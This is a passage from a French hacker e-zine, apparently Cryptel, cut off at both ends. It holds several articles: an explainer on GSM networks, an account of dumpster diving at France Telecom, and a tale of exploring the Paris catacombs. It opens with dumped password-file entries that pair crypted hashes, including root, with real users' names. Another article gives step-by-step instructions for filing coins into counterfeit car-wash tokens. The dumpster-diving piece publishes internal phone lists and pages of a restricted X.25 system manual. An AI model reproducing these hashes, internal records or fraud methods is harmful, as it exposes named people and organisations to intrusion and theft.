mentor:v3r/pSTrKCz0w:89:72:Mentor:/usr/groups/mentor:/dev/null maj:KyaXu2IXS07oA:101:20:Martyn Johnson:/home/maj:/usr/bin/bash pb:rL999AvVVuudM:104:20:Piete Brooks:/home/pb:/usr/bin/bash gt19:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash gt:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash gtcsh:ZoaJBDqJXVMq.:178:20:Graham Titmus:/homes/gt:/bin/csh ckh:lbuRVWtVkFX5w:1167:20:Chris Hadley:/homes/ckh:/usr/bin/bash rocket.cc.umr.edu: Un server de l'universite du Missouri-Rolla ***************** root:9ZW.ILIJpPQ72:0:3::/:/sbin/sh daemon:*:1:5::/:/sbin/sh bin:*:2:2::/usr/bin:/sbin/sh troot:kerberos:0:0:AFS Base Root User:/afs/umr.edu/software/sysprog/troot:/umr/bin/tcsh ff:kerberos:1017:5000:Bruce McMillin:/afs/umr.edu/users/ff:/bin/csh jlu:kerberos:2435:5000:Jui-Lin Lu:/afs/umr.edu/users/jlu:/umr/bin/tcsh rms:kerberos:5002:5000:Richard Ceci est un résumé du password file en effet il y 1500 logins avec KERBEROS. Kerberos k'est ce que c'est ? c'est un systeme de password temporaire qui change tres souvent, d'ou la présence de kerberos a l'emplacement du password crypté. -=- Je compte sur vos contributions ou collaborations. Aaah@mail.dotcom.fr (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Elephant bleu ) 2.9 ( ced99 ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) INTRO Les stations de lavage Elephant bleu sont gerees par la societe Hypromat lavage. Cette societe est tres bien implantee en FRance et en Europe. D' ou l excellente idee de produire un jeton universel.Comme une station de lavage coute tres chere, hypromat utilise des monnayeurs peu perfectionnes.Le systeme de detection de la piece est base sur trois principes: * Mesure de l epaisseur * Mesure de la largeur * Identification de l alliage Il ne reste plus qu a fabriquer ses jetons. Facile, non ! D' autres methodes pour cracker ces monnayeurs existent, par exemple injecter de l eau dans le monnayeur grace a la lance ou a passer un tournevis pour provoquer un court- circuit dans la partie electronique. Ces procedes sont peu fiables et aleatoires.Et puis PEACE and LOVE nous ne sommes pas des vandales. CONCEPTION Donc il ne reste plus qu' a fabriquer ces jetons. Le plus difficile est l alliage.Mais en regardant de plus pres ce fameux jeton on s' apercoit qu il nous est tres familier. En fait la piece de 50 centimes lui ressemble etrangement.Bizarre, non.Vous me direz a quoi sert de payer des ingenieurs ? Les modifications a apporter a cette piece sont minimes. le seul materiel a utiliser est une meule ou une lime si le courage vous en dit. Mais prenez plutot une meule c est plus rapide.Commencez par usiner le contour de la piece.A l origine cette piece possede des peites fentes;ils faut les faire disparaitre entierement.ATTENTION a ne pas trop usiner la piece sinon apres la piece ne sera plus reconnue. La deuxieme etape est d' usiner les 2 faces, il faut eliminer le petit rebord autour de la piece. UNE fois de plus attention, l' usinage doit etre etre tres minutieux.Avec l habitude, ca va tres vite. Le resultat n est pas sur a 100%. Usinez plusieurs pieces et essayez-les. Si une piece ne passe pas dans un monnayeur, cela ne veut pas dire qu elle ne passe pas dans celui d'a cote. Le seul moyen pour hypromat de contrer cette fraude serait deja de renvoyer les monnayeurs pour les retalonner plus precisement (seules 3 societes en france reprogramment les monnayeurs), de changer ces jetons qui ont a peine un an de service et ki sont distribues dans toute l' europe. Cette modification fonctionne pour le lavage (equivaut a une piece de 10 frs) mais aussi pour l aspirateur dans certains centre de lavage. ATTENTION a ne pas utiliser ces pieces lorsque le cum qui remplit les bidons de savon est dans le coin. INFOS: Certaines pieces provenant des antilles et de la polynesie francaise sont reconnues dans certains distributeurs comme des pieces de 20 frs. BY ELEPHANT MAN FOR CRYPTEL. (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Paris Underground ) 2.10 ( vatoo ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) GSM, standard europeen de la telephonie mobile Le systeme GSM (Global System for Mobile communications) a ete defini a la fin des annees 80 par des operateurs et des industriels reunis par l' Etsi (European Telecommunications Standard Institute). L' objectif etait de creer une norme eyropeenne de telephonie cellulaire numerique palliant les lacunes des systemes de telephonie cellulaire analogique (taille importante des mobiles, incompatibilite entre les pays, non confidentialite des communications, et efficacite spectrale faible). L' evolution rapide du marche a favorise la creation de portables de petite taille, offrant une bonne qualite d' ecoute, et utilisables partout en Europe. La norme GSM constitue aujourd' hui une reference mondiale, sauf aux Etast-Unis, ou les technologies CDMA-TDMA dominent. En France, 3 operateurs ont obtenu une licence permettant de developper un reseau GSM. Ainsi, Bouygues Telecom, France Telecom Mobiles et SFR developpent constamment l' infrastrucutre de leur reseau, c' est a dire les equipements qui raccordent les telephones mobiles au RTC (Reseau telephonique commute, voir CRYPTEL #1). La liaison entre telephones mobiles s' effectue via des stations relais radio. Chacune d' elles assure la communication radio avec les mobiles dans une zone geographique precise, appelee cellule. La qualite et la disponibilte du service etant liees a la qualite des communications radio, il est necessaire soit d' augmenter la puissance des mobiles (ce qui en augmente la taille), soit de multiplier le nombre de ces stations relais radio. Ainsi se sont installees sur le toit des immeubles des antennes assurant la communication avec les mobiles. La repartition geographique des relais radio depend de la densite de trafic estimee. A la campagne, les cellules, moins nombreuses, se deploient dans un rayon large (35 km environ). En revanche, en ville, ou le trafic est beaucoup plus important, les cellules couvrent une superficie reduite (300m de rayon environ). On parle alors de microcellules. L' ensemble des cellules du reseau d' un operateur forme le PLMN, auquel est attribue un ensemble distinct de frequences. Cela permet aux reseaux Bouygues Telecom, Itineris et SFR de couvrir la France, sans que les interfaces ne viennent parasiter les communications. Le PLMN, une architecture complexe L' utilisateur peut appeler un correspondant (et etre appele) quelle que soit la cellule dans laquelle il se trouve. S' il est impossible d' affecter de maniere fixe les canaux radio aux differents abonnes, il est necessaire d' allouer dynamiquement les differentes ressources physiques aux echanges logiques relatifs aux abonnes presents dans les cellules. Cette fonction, appelee la gestion des ressources radio (RR), fournit une meilleure efficacite spectrale que ne le faisaient les anciens systemes analogiques de telephonie mobile. Elle acroit la capacite de trafic et le nombre d' utilisateurs du reseau de telephonie mobile. La gestion de la mobilite est une autre fonction essentielle de ce type de reseau, qui inclut la localisation des mobiles en veille ainsi que l' etablissement et la maintien des comms pendant un deplacement (hand-over). L' infrastructure d' un reseau de telephonie mobile, ou PLMN, est composee de trois sous-systemes: le sous-systeme radio (BSS), le sous-systeme d' acheminement dans le reseau (NSS), et, enfin, le sous-systeme d' exploitation (OSS). Le premier est un modem qui assure la gestion des ressources radio indispensables aux echanges avec les mobiles, et le transfert des comms entre les mobiles et le NSS. L' interface mobile-NSS est appelee interface Air. Elle offre une bonne qualite de service grace a la transmission numerique et au codage de la voix. La confidentialite des communications est assuree par le chiffrement des echanges. L' interface Air est caracterisee par un schema d' acces multiple a la fois frequentiel et temporel, qui a pour nom TDMA. Sur chaque frequence emise par un relais radio, on obtient une decoupe des trames en 8 intervalles de temps. Les couples (frequence et intervalle de temps) constituent les ressources radio physiques qui sont attribuees par configuration aux differents canaux logiques de controle, de signalisation et de trafics necessaires aux echanges entre les mobiles et les BSS, sous-systeme radio constitue de plusieurs types d' equipements, dont les BTS. Les BTS sont les stations de base qui assurent le couplage radio avec les mobiles sur l' interface Air. Ils effectuent egalement le multiplexage des trames TDMA, le traitement du signal de parole (modulation, demodulation, codage canal, chiffrement et transcodage GSM-MIC, modulation par impulsion et codage) ainsi que les mesures de puissance des mobiles pour assurer une bonne qualite de communication. Les BTS sont pilotes par le controleur de station de base (BSC). Cet organe intelligent du BSS concentre les circuits de parole et de donnees vers le sous-syteme d' acheminement dans le reseau NSS. Il gere les ressources radio physique et les canaux logiques, et alloue ces derniers aux appels qu' il traite. Le BSC administre la mobilite des abonnes entre les cellules qu' il pilote. Enfin, il realise le controle des mobiles, tant en matiere de puissance d' emission que de synchronisation temporelle. Les BTS d' un BSS sont relies aux BSC par des liaisons MIC a 2 Mbit/s. Sur ces liens transitent les comms vocales ou de donnees, ainsi que la signalisation BTS-BSC, MS-BSC et MS-MSC. La signalisation utilise le protocole LAPD (Link Access Protocol Digital) pour la couche de liaison de donnees. Le commutateur, lien entre le fixe et le mobile La deuxieme partie d' un reseau de telephonie mobile comprend le NSS, sous-systeme en charge du traitement d' appel, de la connexion au reseau telephonique, et de la gestion des abonnes. Il est interface avec plusieurs BSS, et a un role de concentration et de commutation des comms. Un NSS se compose des enormes bases de donnees relatives aux abonnes (HLR) et a la localisation des mobiles (VLR). Les commutateurs, baptises MSC, sont le plus souvent dotes des commutateurs du RTC, auxquels les fonctions specifiques du GSM ont ete ajoutees par les mecanismes de reseau intelligent. Ils etablissent les appels entre les mobiles et les abonnes fixes, ou entre les mobiles, et incluent les fonctions de traitement des appels (CC), de gestion de la mobilite (MM), d' echange des messages courts (SMS, Short message services), et d' administration des services supplementaires (SS). Certains d' entre eux sont interfaces avec le centre a autonomie d' acheminement (CAA) du RTC, ils sont alors denommes GMSC ou passerelles MSC. Le trafic entre les MSC peut etre achemine par le RTC. Mais depuis quelques annees, l' operateur d' un reseau de telephonie mobile (PLMN) peut utiliser sa propre infrastructure de transmission pour etablir des circuits de parole entre les MSC. L' acheminement des appels est alors conduit par le PLMN jusqu' a un GMSC, qui transmet l' appel au CAA auquel il est connecte. Chaque MSC est couple a une base de donnees qui recueille les donnees d' acheminement relatives aux abonnes visiteurs situes dans une zone precise (VLR). Une deuxieme base de donnees (HLR) contient les infos relatives aux abonnes telles que les services souscrits, leur identification, leur numero d' annuaire, ainsi que la reference du VLR correspondant a la localisation de l' abonne. Un PLMN pourra contenir un ou plusieurs HLR selon le nombre d' abonnes. Pour la partie controle, le reseau de telephonie mobile dispose d' un centre d' authentification (AuC). NSS et BSS relies par interface normalisee Cet equipement gerant les cles de securite de chaque abonne est souvent situe sur la meme machine que le HLR. Le centre d' identification (EIC, Equipment Identification Center), lui, contient les infos necessaires pour verifier que le mobile est autorise sur un reseau. Pour relier les deux sous-reseaux, NSS et BSS, les operateurs mettent en oeuvre une interface bptisee A. Grace a cette normalisation, ils peuvent interconnecter les equipements NSS et BSS de differents constructeurs. Les controleurs des stations de base (BSC), eux, sont relies aux MSC par des liaisons MIC a 2 Mbit/s par lesquelles transitent les comms avec les mobiles et la signalisation MS-MSC ou BSC-MSC. La signalisation utilise les protocoles du reseau semaphore SS7 et une couche specifique au GSM, appelee BSSAP. Les divers MSC d' un PLMN sont aussi relies par des liaisons MIC, qui vehiculent les circuits de parole. L' echange de signalisation entre les constituants du NSS est realise par le reseau semaphore SS7 associe au PLMN, auquel a ete ajoute le protocole MAP (Mobile Application Part). L' interface MSC-HLR est normalisee pour autoriser les echanges de signalisation entre PLMN lorsque les mobiles sont utilises a l' etranger. L' interface PLMN-RTC ou PLMN-RNIS est realisee par les passerelles GSMC connectees au CAA par des liaisons MIC a 2 Mbit/s et par le reseau semaphore SS7. Questions/reponses: Q- Comment un utilisateur est-il identifie ? R- >>Etape1:Quand un mobile fonctionne, il parcourt les frequences et recherche les canaux de controle emis par les stations de base (BTS) afin de se synchroniser en frequence temporellement.Le mobile ecoute les infos systemes diffusees par les BTS pour recueillir toutes les infos sur le reseau. >>Etape2:Une fois que la station de base susceptible de lui fournir la meilleure qualite radio a ete retenue, le mobile demande un canal de signalisation dedie, alloue par le sous-systeme radio (BSS) >>Etape3:Ce sous-systeme etablit une connexion SS7 avec le commutateur du reseau (MSC). >>Etape4:Quand le mobile a signale sa presence au commutateur MSC visité, celui-ci met l' identite du mobile dans les bases de donnees locales centralisees. >>Etape5:Le commutateur fournit au mobile une identite provisoire qui sera ensuite utilisee pour les echanges entre le mobile et le reseau. Q- Qu' est-ce que la puce SIM ? R- Chaque abonne GSM recoit une carte a puce denomme carte SIM (Subscriber Identification Module), qui constitue sa carte d' identite sur le reseau. Cette carte renferme les informations necessaires pour acceder au reseau d' un operateur. Elle existe sous deux types de formats: carte de credit et miniature. La carte SIM contient des caracteristiques du reseau (identite du PLMN et plage de frequences utilisee), des parametres d' abonnement (identite internationale de l' abonne et services demandes), des donnees de securite (mot de passe de l' abonne ainsi que cle d' authentification et de chiffrement), des informations sur la mobilite (identite provisoire et indicateur de zones de focalisation) et, enfin, des donnees temporaires comme les messages courts recus. Q- Quelles sont les etapes d' un appel d' un poste fixe a un mobile ? R->>Etape1:L' abonne du reseau de telephonie fixe compose le numero de l' abonne mobile (MSISDN). Celui-ci est de la forme ID Z AB PQ MCDU. L' ID est l' indicatif du pays (33 pour la France); Z indique la zone (Z=06, qui est reserve pour les mobiles); AB est l' indicatif attribue a chaque operateur (07 et 08 pour FT, 60 pour Bouygues, 09 pour SFR); PQ identifie le HLR, et MCDU l' abonne. >>Etape2:L' appel est transmis au commutateur d' acheminement (CAA) auquel l' abonne fixe est connecte. >>Etape3:L' appel est aiguille vers le commutateur passerelle (GMSC) le plus proche du reseau mobile. >>Etape4:Pour connaitre les informations sur l' abonne mobile, ce commutateur passerelle interroge la base de donnees centralisee (HLR). >>Etape5:Le HLR interroge a son tour la base de donnees locale (VLR) du commutateur (MSC) pour localiser le mobile. >>Etape6:En retour, la base de donnees locale fournit a la base de donnees centralisee un numero provisoire (MSRN). >>Etape7:La base de donnees centralisee informe le commutateur passerelle du numero provisoire pour pouvoir joindre directement le commutateur visite par le mobile. >>Etape8:Le commutateur passerelle va etablir un appel vers le commutateur concerne. >>Etape9:Le commutateur recherche le mobile en demandant une procedure de recherche (paging) au controleur de stations de base (BTS) du sous-systeme radio concerne (BSS). >>Etape10:Le BSS diffuse alors la recherche (numero provisoire du TMSI) sur toutes les stations de base (BTS). >>Etape11:Une fois le mobile repere, le BSS lui alloue un canal de trafic. Le circuit de parole est etabli entre le mobile et l' abonne fixe a travers ce canal de trafic. La conversation peut alors commencer (enfin!). Q- Quelles sont les etapes d' un appel d' un mobile a un poste fixe? R->>Etape1:Le mobile utilise le canal de signalisation pour s' identifier aupres du reseau, etablir le chiffrement, et demander au commutateur visite l' etablissement de l' appel sortant. >>Etape2:L' analyse du numero de l' appelant dans la base de donnees centralisee permet au commutateur de constater que le numero appartient au reseau fixe. >>Etape3:La base de donnees centralisee (HLR) recherche l' adresse du commutateur passerelle (GMSC) auquel est rattache l' abonne fixe. >>Etape4:La base de donnees HLR communique cette adresse au commutateur MSC relie au BSS, sous-systeme radio sur lequel l' utilisateur mobile est raccorde. >>Etape5:Le commutateur aiguille alors l' appel vers ce commutateur passerelle MSC. >>Etape6:L' appel est route vers le centre d' acheminement auquel l' abonne fixe est connecte. >>Etape7:Le centre d' acheminement entre en contact avec l' appele, et la communication peut alors s' etablir. >>Etape8:Le commutateur demande au sous-systeme radio (BSS) d' allouer un canal de trafic. >>Etape9:Le canal de signalisation est libere, et le circuit de parole est etabli entre le mobile et l' abonne fixe. >>Etape finale:Lorsque l' un des deux abonnes raccroche, un dialogue de fin d' appel se deroule entre le commutateur et le mobile, et le canal de trafic est libere. (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) TrAsH FT ) 2.11 ( Aaah@mail.dotcom.fr ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Malgre les -10°c, le vent, le froid, la neige, la pluie, le gele, le verglas, l'ouragan, le typhon, le cyclone, la dépression polaire arctique et antarctique (bon on va peut etre s'arreter là) Aaah a bravé les intempéries pour aller trasher chez FT. Tan Tan Tan héroique non ? :-) Bon ca a pas ete une mince affaire parce que la poubelle que je visais ce soir là etait en plein champs de vision du gardien ... dur ... enfin j'ai profité d'un instant ou il lavait sa vitre pour m'emparer d'un sac poubelle et disparaitre dans la nuit pour aller accomplir mon devoir ... Tan Tan Tan. Bon alors y avait pas mal de truc dans cette poubelle on va commencer par les trucs FUN : - Le journal syndical de la CGT : NON AU 35 HEURES ! (ça promet) - Une tonne indescriptible de mégots et cendres (zont nerveux chez ft ?) - Du détergeant chimique (ça c pas cool j'ai eu des taches ...) - et cerise sur le gateau : du pq ... on aura tout eu dans celle là ... - J'oubliais l'apotéose un mail envoyé a une employé qui ressemblait fort a une invitation dans un secte ("venez entendre la voie de la raison") Plus sérieusement j'ai trouvé quelque trucs interressants : - Un CD-Rom en cours d'analyse (bah oui il est abimé) une chose est sur le parc informatique pour les employés de FT c win 98/95 et NT - Une liste des badges ayant acces à certains niveaux de sécurité dans le batiment. Je ne la publierai pas tout simplement parce qu'elle ne sera d'aucune utilité pour vous :-) et ça indiquera trop vite à FT ou j'ai trashé (quoi qu'a mon avis c facil à deviner) - Une liste (celle ci beaucoup plus instructives) comprenant plusieurs N° de tel et jargon technique que je n'arrive pas à définir. Je vous publie cette liste si qqun aurait la définition de certains trucs ou peut tout simplement éclairer ma lanterne, un petit mail sera le bienvenu (Aaah@mail.dotcom.fr) Nom du centre: CPRI: N° COLISEE FAX: RESEAU: ====================================================================== Amiens Lille 277 111 / 277 406 0322537280 0322537111 ====================================================================== Andilly 209 690 / 209 611 0134329608 0134329611 ====================================================================== Angers Nantes 0241607515 ====================================================================== Annecy 227225/227228/227457 0450667449 0450667444 227111/227459 ====================================================================== Archives Sebastopol 207460/207111/207419 0148017499 208123 7111 ====================================================================== Arpajon Villabe 0164900823 ======================================================================= Aubervilliers 215005/215111/215004 0148115111 215007 GEB 0143525718 ======================================================================= Auber DRIF 0143525150 GLM 0148341717 ======================================================================= Auber GEB 0143525113 ======================================================================= Auxerre Dijon GET: 0386493590 0386522941 ======================================================================= Bagnolet 268574 CONS: 268488 0149938574 ======================================================================= Bayonne 0559526196 ======================================================================= C.I.P.B 206401 / 0142446262 ======================================================================= Beauvais Amiens CPE: 0344841392 ======================================================================= Bercenay 267114 ======================================================================= Besancon 207111/257444/257448 0381801389 257455 277449 ======================================================================= Bessancourt Eragny 209 111 / 209 356 0130403904 ======================================================================= Bordeaux 243111/243408/243404 0557813401 S 243444 243 429 ======================================================================= Bordeaux mer 243528 ======================================================================= Caen academie 231111/231608/231629 0231251120 0231251111 ======================================================================= Caen ven GET 231227/231228 0231251111 CONS: 231241 ======================================================================= Chartres Orleans CPE: 0237208739 ======================================================================= Chateauroux Tours 0247405381/82 ======================================================================= Chenneviers 219527/219528 CONS: -524 SUP: -523 0149629429 0149629111 ======================================================================= Chenne HZ 219402 ======================================================================= Clamecy Auxerre CPE: 0380303456 ======================================================================= Clermont FD 225832/225802 0473425700 ======================================================================= Corbeil Villabe 201111 commut: 201470 0169114513 ======================================================================= Creil Amiens 0344281020 ======================================================================= Dijon 256111/-454/-325/-258 CONS: 256455 ======================================================================= Douai Lille 254 359 ======================================================================= Echiquier Sebastopol 207111/207379/S:207719/ 207412 014817111 ======================================================================= Evreux CPETRAN: 0232315730 ======================================================================= Voilà ça c'est qu'une 1ere partie j'ai toute une liste des villes par ordre alphabétique, si qqun veut la suite il me mail je lui envoie et il en profite pour m'expliquer un peu ce truc parce que là j'avoue je nage ... (CPE? Colisee ? CONs, GLM, GET, GSP etc ... :-) - Un dernier tres interressant malheureusement je n'ai pas eu le fichier entier j'en ai que 3 pages : Le manuel utilisateur du PM2 à diffusion contrôlée. C'est dommage que j'ai 3 pages sur 69 mais bon je garde espoir de le retrouver entier lors d'un prochain trash :-) II Procedures de connexion et de deconnexion ******************************************** 1.1 Connexion L'acces PM2 se fait viale réseau x25. Tapez le numéro d'acces à PM2 sur votre terminal et validez ## ## ## Apres le message d'acceuil notifiant votre enregistrement tapez: CN MP2 Puis votre identifiant ###### ensuite votre mot de passe ###### Le mot de passe vous est délivré par la Direction d'apllication MP2 Tel: 0141375168 - 0141675299 - 0141675298 Fax: 0141675169 */C aaah la qui parle je vous demande de pas appeler ou tenter un social en ardos sans rien sous le bras grillépas tout de suite ce numéro\* L'ecran suivant apparait: ----Informations PM2-23B --------- MENU GENERAL --------- ABANDON (nul): ************ INFO EXPLOITATION DU 14/01/98 ------------------------------------------ *************** Le numero du centre de calcul est le 0141675449 ******** Le 14/01/98 a 8h30 reste a reemettre: 378 os dans TEMILEX a 14h reste a reemettre: os dans TEMILEX PB pour reemission os du password = support FONCT 23B au 0141675295/96/97 PB password PM2 = support fonctionnel PM2 au 0141675168 ************************************************************************ INFO 23B du 09/01/98 --------------------------------------------------- ************************************************************************ * * * AUX UTILISATEURS: merci de signaler les incidents sur le V60 aux sup * * fonct un cadeau sur INF23B * * * ************************************************************************ INFO PM2 du 23/08/95 --------------------------------------------------- `INF` permet de consulter les numeros de FAX des destinataires RECTIF Modification du numero de FAX du centre CARNOT : 40545232 devient 44151212 ------------------------------------------------------------------------- Vous etes maintenant connecte au TDS de M2/23B. Sans vous preoccuper de positioner quelconque curseur tapez encore: PM2 Vous etes maintenant connecte a PM2 (voyez page suivante les ecran d'accueil que vous faites defiler en appuyant sur la touche TRANS ou RETURN et vous pouvez commencer toute consultation de votre choix (voir la liste des consultations possibles plus loin dans ce manuel) [FIN DE PAGE 6/69] j'ai pas la suite ... si qqun a mailez moi Autre page du manuel: DEMANDE D'EXTRACTION (suite) **************************** L'ecran suivant apparait: ------------------------- CREATION CTL:_____ SELECTION DES EDITIONS CODE SITE DESTINATAIRE:_ 1- EDITION DES BLOCS 2- EDITION DES BLOCS AVEC ROUTAGE 3- EDITION DES ENSEMBLES DE SECURISATION 4- EDITION DES SECTIONS 5- EDITION DES SECTIONS D'UN CENTRE OU D'UN REPARTITEUR 6- EDITION DES SECTIONS AVEC ROUTAGE 7- EDITION DES TRONCONS 8- EDITION GLOBALE DES COFFRETS 9- EDITION PARTIELLE DES COFFRETS 10- EDITION DES MOUVEMENTS DES CASES DE COFFRETS 11- EDITION DES LIAISONS SPECIALISEES 12- EDITION DES PLANS DE CABLAGE 13- EDITION DISPONIBILITE DES BLS 14- EDITION PARTIELLE DE BPN NUMERO D'EDITION: __ DERNIERE DEMANDE CREE: 09553 Tapez "G" (comme Noisy-le-Grand) dans le champ , choisissez l'edition qui vous interesse, Validez, Servez l'ecran correspondant à votre demande et validez les parametres que vous venez de saisir sur ce dernier écran. Notez bien alors le numéro d'édition affiché à la ligne DERNIERE DEMANDE CREE c'est lui qyu vous permettra de modifier (type2 du contexte de travail) ou de supprimer (type 4 du contexte de travail) votre demande. N'oubliez pas d'inscrire le champ l'adresse ou devra etre envoyé le listing par la cellule PM2. si vous avez demandé une sortie disquette, telephonez au 0141675299 en donnant votre code demandeur et le numéro de votre demande. En vous mettant le lendemain en mode "MODIFICATION" et en rappelant votre demande vous saurez si votre demande a ete traitee. Remarque: certaines editions ne sont possibles qu'a partir du superviseur PM2. Telephonez [FIN PAGE 66/69] Voilà cette machine a l'air vraimment interessante, si qqun a la doc (on sait jamais) + d'infos sur ce systeme, etc bah vous connaissez ma phrase rituelle : mailez moi Aaah@mail.dotcom.fr. Participez on va pas tout faire ! Resultat de trash RDV au numéro 3 (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Paris Underground ) 2.12 ( vatoo ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Une visite du sombre monde sous la ville lumiere- par murray battle, traduit et adapte par vatoo. Une visite non-guidee des catacombes Parisiennes. La vision est fantastique - des murs entiers d' os et de cranes entremeles, des galeries symetriques. C' est un vrai contraste avec les reelles catacombes, a ce que j' ai appris plus tard. La plupart des touristes etrangers n' ont aucune idee de ce qui se passe en ces lieux. Il y a un grand nombre de citations, dont ma preferee: "Insense que vous etes, Pourquoi vous promettez-vous de vivre longtemps , vous qui ne pouvez compter sur un seul jour". Nous apparaissons dans une grande allee, loin de notre point de depart, il fait chaud, c' est tres sombre, et je me sens un peu impressionne. Je suis ici a Paris pour comprendre pourquoi les gens vont dans ces sous-sols. Cela parait totalement irrationnel. Nous finissons tous ici, 6 pieds sous terre. Pourquoi accelerer le processus? Emmanuel Gabily va me servir de guide dans l' underground. Je le trouve inquietant. Nous nous sommes rencontres sur le net et nous sommes a present assis face a face dans un cybercafe dans un quartier industriel de Paris. Emmanuel est inquiet a propos de mes bottes. Il pense qu' elles ne sont pas assez hautes. Ce n' est pas bon signe. Emmanuel n' est pas seul. Il est accompagne d' un garcon denomme Benito (Benjamin Nitot), qui adore, tout comme Emmanuel, initier des neophytes. Nous nous promenons dans la voiture d' Emmanuel, alors que le paysage citadin de Paris disparait peu a peu. Nous entrons dans la banlieue. Emmanuel connait quelques caves qu' il desirerait nous montrer. La premiere est faite de craie. Je n' ai pas une grande impression a ce sujet. >>La cave de craie Nous sommes rejoints par trois autres cataphiles hommes, dont l' anglais est aussi pietre que mon francais. J' attends le dernier moment pour mettre mon casque-torche de speleologie. L' entree est en fait une fissure de roche, dans des bois eloignes. Heureusement, il y a une echelle, d' a peu pres 10 m de hauteur. Je suis immediatement subjugue par la beaute de cet ensemble. Pas de claustrophobie ici. Ce sont plus des cavernes que des tunnels. Emmanuel laisse sortir un cri - quelque chose qu' apparement il execute a chaque descente. Il n' y a pas d' echo. Les murs de craie absorbent tout. Les autres nous rejoignent. Notre guide nous mene par le labyrinthe en ayant jamais besoin d'une carte. Ca semble bien indique mais je ne pourrais jamais retrouver mon chemin arrière. Il dirige sa lampe aux points de danger - fissures soudaines, puits sans fond - aucuns rails de guide ici. Des machines sont abandonnees ici depuis des decennies. On observe des signes de visitation precedent - bouteilles en plastique, bidons, batteries jetees. Une echelle rachitique mene vers le haut d un mur emiette, a un trou de lapin dans le plafond et, des promesses d'Emmanuel, a un niveau superieur. Nous serrons un par un. Ici, c' est tridimensionnel.Il y a au-dessus de et ci-dessous et autre ci-dessous et... dans la mesure ou vous pouvez aller. Mais maintenant je comprends pourquoi on vient ici. Il y a pas loin un balcon - une vue ouverte de la ligne des tunnels ci-dessous. Et c'est un endroit pour faire le camp. Nous nous asseyons pour nous reposer. Lentement, sans instruction, chacun arrête sa lampe ou la lampe-torche pour se trouver dans l' obscurite - totalement noir. Et silencieux. Pas un bruit. Aucune égoutture. Rien. RIEN!! Je n'ai jamais eprouve quelque chose comme ca. Vous ne devez pas fermer vos yeux. Le tombeau d'un homme est le refuge d'un autre homme. Enfin Emmanuel me demande d' allumer ma lampe-torche pour lui permettre d' allumer la sienne. Il saisit son sac à dos. Les autres commencent un feu avec du propane liquide et ouvrent des boites de confit de piment. Nous conversons tranquillement, en français et anglais. Emmanuel allume et plante une bougie a chaque intersection du tunnel. Un autre moment magique. Je pense à Robert Smithston. Terrassements - 30 ans après - cette fois sous la terre. Au retour d' Emmanuel, j' ose poser une question stupide: 'Pourquoi le faites-vous?' " pour laver mon cerveau, " il ose, suivi d'un rire explosif. " c'est un autre monde, mais c'est notre monde. Il y a une culture. Personne ne peut nous toucher ici. " Quelques km de carriere de pierre a chaux plus tard, nous sautons a cloche-pied une barriere pour nous retrouver dans une autre carriere. Quelqu'un cultivait des champignons et collectait des pommes de terre ici. C' etait un veritable desordre organique, accompagne d' un camion Citroen. Il doit etre 5 ou 6 h du matin, nous sommes tous fatigues. Nous decidons de nous arreter a cet endroit, caracterise par des sculptures sur les murs. Nous partimes par des rues desertes de Paris, alors que l' aube se cassait sur l' horizon de la ville. Benito ronfle profondement sur le siege arriere; au moins, il maintient Emmanuel eveille. Il mentionne en passant une soute allemande de la deuxieme guerre mondiale, sous un lycee pres des jardins du luxembourgeois. Dans les tunnels Le vendredi au soir, j' ai pris le Metro le plus au sud a la Porte d'Orleans, puis j' ai marche, un peu perdu. Ca n' etait pas sur ma carte. Emmanuel et deux nouveaux m' attendaient au coin d' une rue de la banlieue. La scene etait digne de ' L' Exorciste '. Hmmm. Stephane, trentaine d' annees, et Jean-Baptiste, vingtaine d' annees, se donnent la peine de pratiquer leur anglais, et me controlent poliment a l' exterieur. Oui, je peux consacrer 8 a 9 heures de mon temps. Oui, je peux continuer. J' avais l' impression que la nuit precedente n' etait en fait qu' un test pour quelque chose.... d' important, de serieux. C' etaient des caves. A present ce sont des tunnels. Il y a une difference. Et, encore une fois, le rituel. Enfiler les bottes et la tenue dans la rue. Un pieton passe avec son chien, mais il nous ignore. Mais trois jeunes garcons attachent un velo a un poteau et inclinent la tete. Ils se dirigent vers une petite entree. Nous les suivons quelques minutes plus tard. Au milieu de poubelles et de meubles usagers, Emmanuel se fraye un chemin jusqu' a un mur de briques - notre entree. Notre trou de souris. Cette fois taille dans un bloc de ciment. Les autres prennent le chemin. L' entree est vraiment etroite. Je me contorsionne, puis je chute... dans l' obscurite. Je m' etale au sol, puis m' ecarte. Je ne me blesse pas, et je ne blesse personne, c' est un bon debut. A gauche, il y a une piece, une sorte de station. Les trois jeunes emergent, sans avoir l' air etonne. Emmanuel les interroge. Ils n' ont pas de carte. Ils ne vont pas loin. Ils partent. Ils devraient mieux ne pas aller trop loin s' ils ne veulent pas se perdre. Notre salle d' attente a une nuance de...rose. Stephane est le coupable, il a eu un rabais pour un lot de pots de peinture. En fait, il avait deja blanchi un des murs en surface, mais quelqu' un avait trahi l' entree du tunnel. Ils terminent tranquillement leurs cigarettes dans le silence. Il est temps de partir. Les perils C' est une marche, une marche obligatoire. Nous avons beaucoup de chemin a faire. Nous suivons le chemin de fer ci-dessus. Vers notre droite sur le mur du tunnel il y a des supports en metal tenant des cables. Un eglissade ou erreur de 